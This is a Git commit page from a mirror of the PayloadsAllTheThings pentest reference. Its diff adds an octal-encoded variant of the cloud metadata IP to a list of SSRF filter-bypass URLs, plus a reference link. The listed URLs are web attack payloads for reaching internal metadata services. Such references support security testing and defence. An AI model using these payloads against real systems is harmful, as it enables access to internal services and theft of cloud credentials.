Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update README.md

Browse source
This commit is contained in:
Aj Dumanhug 2022-03-13 01:30:37 +08:00 committed by GitHub
parent 4abd52697f
commit 3c441669d8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
Server Side Request Forgery/README.md
View file

@ -573,6 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all)
```
More urls to include
@ -856,3 +857,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
- [SSRFs up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)